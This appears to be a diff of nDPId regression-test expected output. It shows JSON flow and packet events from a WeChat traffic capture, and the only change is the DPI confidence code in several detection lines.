02248{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1492167351067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAVibQVAAEARaA3AqAFn2DrGLuD3AbsFTsxKDU3ZCrKMtFhpUTAzNQFnbJE8FVI6Xr9TUAWgAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1kb2NzLmdvb2dsZS5jb21yl6H2wP73bUTm\/HO\/L6W7bp3Xhczs9ysCSmeki\/j96A7sEoRFEAE+SB65YLwp5s+42jMDuJu4lkMvUTAzNQHogWCSkhrofu2AhqIVgpFY8Kq3MDAwMDAwMDCSV1vE+gNbm7+W8XblWvpmJ\/49qGQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAAt6rwWAAAAADtcasM4uYqOdGcPkgWTuPinp6tSgmHbpcCw+LDtPZmZuBaJu0QIw4bgS6gnY4km2fVf4E4bxQZEQJVfGW2\/zkLZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmueetXmAEAL+XPr519ndPJ3mPFBWs\/DigCPL0uG+UOo9PlVynP5lP7SYDz1bkGMXY1YNt3+9e\/xaovsHZwZUHeJNaLtZCflec\/IAM0fVlrvjwb6nbNCsXZz6\/cPg4kuVRS2mBg046WN6uU3IIy4QYEX9WeFcdSLySSFcZAp9Y92PScUgAJmXEYeE91IXZUb3jX3RMxTRdpIGidUSIrQaDk8neMszYOzIv3i7wAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167351067,"flow_last_seen":1492167351067,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167351067,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"},"quic": {"client_requested_server_name":"docs.google.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 01693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1492167351067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":969,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":969,"pkt_l4_len":935,"thread_ts_msec":1492167351067,"pkt":"8IQvSpdgeJKcD6iOCABFAAO7bQZAAEARabPAqAFn2DrGLuD3AbsDp2YqDU3ZCrKMtFhpUTAzNQJxZNfHCC8u2f35luXQX7wk8+5+gy499Uo4Fg20rRdDDy5CsdXoRXrF+phU81nis1nRDRx09GXiKDxOppPR5wHoCPv6GGJ1a2aSeKMbWb+zwKTlNc+IgrbKFFqH047ViEQZsFLjifeqmjWw3kLjF9wuTO5xmTDc8NygVX92ZUjcWiRsZklVVPx3NbEThZxDUrne5HeS9hEKQhiWqsRNFsJ5ZewxcV+5cYvvBeYiQR+kS3f\/LZqZAjI6Q5gDCFVg4IVHBTbsdm3CNW6MkXX6Z21DpqBMIia1Z2wV8I9lmIjOLOKjoJcu+pem0sj3G6u1FBaJ6UzuToaeQVFoQV1B7THlLpcbWhfyxWuv5Vq5Nhbvz\/hy9e3GvHaPkX2Ap3unG8P22QcYcGd\/BWZtvoWlpacJDV2epOkkS7tt5wlFKOWfO8\/5Yu\/gJ5xuBFw7XGdmQknr+9LaS3e8wZiMR1ZfimH2Wrss8HcQEl9TcUi0OPt7hg4vPxA1umUMgAjxmP3GICQIJ8v3MSyfSe36zfbmMnzMFR+cZ4RVKOKFuZsig3U7Qla3oB3K2bziFfb7gRL+hERHc4YgKgGNFngj+oqw2jdkj\/RqXvOIZPBl74wKoDpJdAAu0pwpTpg0OYCvwu\/ep3j0WkfwnzYcwnEEOfrkyBT8sslKLByrPD6217xh62Bp0UxecAcjRSXYnXrLG4gF\/OklBRUl9MWf17862YoGJ6mbQ8Q1BCG\/ur1PzAt2\/FqJ05MHkwrkRVSHl4pDeBaR66Du4ZmV0GBx989HTukTQy\/3OGUKXjAXhJdjcsLd1jo\/K0yDhk26WE7HHoqWgHvMgQjGE2RFzuX36OVzPCIEOwd9oe0YVvAfM\/rVc9genM5Hy7Sv8mutamuMH7bROMktPGAdZ\/IFx5w4VWad64HIS2eSUBLGRLvosHNSRrNdfupAMBGIyjJeytCFI+Ljtgl1sqegx6JwAaGxpjS+ZJjXdtHKXMd1GSxa\/aZjv\/gLSgGEeQHgpM0w997OPOSc\/oXhrMG2H9dPnVY0gxfZjD+EVSDAUqgCePMf4Xk+wruAsQ37\/lHXudBmH90ljRj8ye51wbrJXjVUKo39iLcU6hZ05\/StCBdO\/xPb895mMSP5JnWfCWFSaYGQN4FQQYatRm1PasNLHcHWO0PLezKCDM2gsmrDE3X\/KwGBhJhce2KxIu1Tjfe9ZeVoyy0Oxy0Bb7O\/93ta"} 02270{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1492167351121,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167351121,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcR3XLYOsYuwKgBZwG74PcFTmzaBOou0Nigzud3ZaOudETm8GBczN7q3HxIUIOzVIoPsD73AQkDw5o48VPCPgxwE9bagOsfguW4BXFTqIT1IIV5ThjijbPacPMIeuYY+tLcR\/SESotUnfD6k31MBpngxATfGEoS3TSTc9aVt2BKPUkJNXTxIqajXh4z+2CjCT16kZiox8Qmel6o7NAeDdJDfOL+51L\/G92mnF40IupMo8kyn6Yeya9Ad1Q2D\/p2FAN4KbvETwnyCCrN\/3BzK6jhLgRMRUMpD76aZzYbZwTnnjn5cPWJgIaiNlEoyxA7CP6REtuotFUshn\/4\/Je7Jbm8GzbVpuThmCVdHsCKO9eQafmXETXyGPOX37U\/+RYvpidmrbPADR3IJ0YyPcE55eQPeQ3SLMLpJR+N0H26d91w3L3p89mtepH0NeIecXxbZcygXiO3ouImKiBH5Sols1nP6qAehqtyidEipR4ZPAV4Xw0h5rAYVjkhxL41hJnSJmoocaWAxV46W2QvJzsrabDi5M9SzvhRJAsPZZY4K6G5dvQpS2uzTzQOzxWkGBlQl7RRRgKZIcNK4yIcQD0yIGCwwoktA2Ld1Idk2Cu5os+Y7KXAeUWL4EghycwrRGckuLuUQjKt2wiWE8fO7O4\/Lv2VZCpq74PXu3G5CCkcU65VQJeeZrPt8UoeqowDQ+esOAIZ137WnNojv8+UsGDeg+xMKBRUrYaoT8ER8YifN6riDqUjipfNYkbEn8ucoDGqAIlyleAS5\/XHM13il1iRyxEOLilein7LTbUQNfwFOf8EzXgCnR+IpNR4wHUKNWXhmNPOYokIP23Sl\/FaC5yeTIvYRTQb\/x8mhYj\/WIs05PouLe9Pt+TRR3N2YyYcD4kqZDJk1bVFKuF7bqCGCM51z3lvURyUWHByifpl1Q0srxqBnb92qDujj+Ug5Hs9Ty\/kFB8qHvx1Dfq78jAeHz0fzz7AMlq+79RPkRIGLCbIkRGUTiiYKOqV8DW1cQsg\/KZWg+kdRSdfwb30mOCaUqILvOyhuHsdt\/VlQOncdoNcoPzCka952teJvpu3kHP0JF00GT6\/QgvMxqqvMT68gpqKr7VNH2JM4rMWfmQe7d70oO4rLXnu5+c5UkqU4+\/yoY+zdy1UMw3UYnE\/RB4x5v7QiQt4jRnCl6tLIdDw9lQg9IzEnVZzw2lt7lY+\/FC4dmux3GBahkU7C9wFjO9v95glXVXJsAYEhvS3wJvsdmH9ydK\/F3zD4bHe6QH8wln\/KtF+\/2hcmCsTO+QWhFCYnQytBu\/Dd7UqbnYMeu6CvYKHngUiBNqyzWOGJEUUIwiWru1HLQ+oi18IFAgJS2Pl99aG5LYQ83XtdOxJ4pO0nKlJ0xc1wx6vqc9D94XgPsJhPmRnKuyWzZTwOjFjJ4fG3PqBIeO52giJ97T6kI1ufnseC2DoOQ7mgmmkhk1xFPh\/iCEO2sH8\/yvC3ciJ3q1jHvS6trEx0psWwZhrcKMoj6uJQAqWOx\/4VMZblPtRO0JRK2sKrnR0AuXFvTgyJJXrSQnKCt4f0Ie08Z0FhokeNmZugGY11eoMg2b0Ohw1Gcl+Nco\/Mm0dOR0d0ZzowYYFQVn8Z1G5U0v2I0P+bjqBg\/Oft0VL\/uESmpcBS8+q9YYq03mdZfyrm0Wll6v2MrVZ+luVDiDPf+2zCNGMeJyqwXqCBY\/GUBtV\/ORVHwTg4O9+bDUiGoGMfoIrfv0WX52viV1sxsvodgKw\/K7R89paaPWnO6gRTKekrbX0nVKtcWseMnbmEds6efJmpuqUD3hZqUyUuRhdxz6a7pUXagTh"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167352068,"flow_last_seen":1492167352068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167352068,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -57,7 +57,7 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1492167352122,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352122,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0OfYAACsGqnlA6ae8wKgBZxRsjLFKrVv6utDMqYAQAWVTqwAAAQEICoWdcMgAL7Ej"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1492167353674,"pkt":"eJKcD6iO8IQvSpdgCABFoAD6dwRAACwGsNrLzZeiwKgBZwG70ypPgUs4IVggsIAYAQuBHwAAAQEICkXRpIYAMKn\/FwMDAMGOrZUQQd+ekzcfermPixMN7baWMlCLOjLGRLUay7A9ywN4ZUGmiUXDO1gdTDC98QU1t8eAbnyMFUBj5qM3d0y5XCUUPMCeBhhxcxN\/8G4Ch12FyipeyhGtwqgzXcsPc5ZQsJ\/Yfu\/XdVaAYYDYsfkQdrrVo9IGd6i0jIOj1GEXv+MuFcw5UP8MbQ5QLfOihRir7leYEOxmHGeDrisZkZBhOzKLL2Q5myihhKQJ9yeXWCsp\/s4j9ebB8kfX1kVSE8Aa"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1492167353675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353675,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0n8JAAEAGdYLAqAFny82XotMqAbshWCCwT4FL\/oAQAcj35wAAAQEICgAwuphF0aSG"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoXgBAAEAGtx\/AqAFny82X058lAbtnDvSGeC5ApFARAOXT9QAA"} @@ -73,37 +73,37 @@ 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK5BAAC4G+u\/LzZfTwKgBZwG7nyV4LkCkZw70h1ARAHPUZgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700mLgJvryODc86ASN8g1VAAAAgQFoAQCCApF8RJmADC6mwEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354049,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZmpAAEAGrtrAqAFny82XotNJAbvI4Nzzi4Cb7IAQAOWalAAAAQEICgAwuvZF8RJm"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1492167354296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354296,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG700oogx9AoQ\/Rp6ASN8hHnAAAAgQFoAQCCApF8RKkADC62gEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1492167354296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354296,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0a31AAEAGqcfAqAFny82XotNKAbuhD9GnKIMfQYAQAOWs3QAAAQEICgAwuzRF8RKk"} -00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 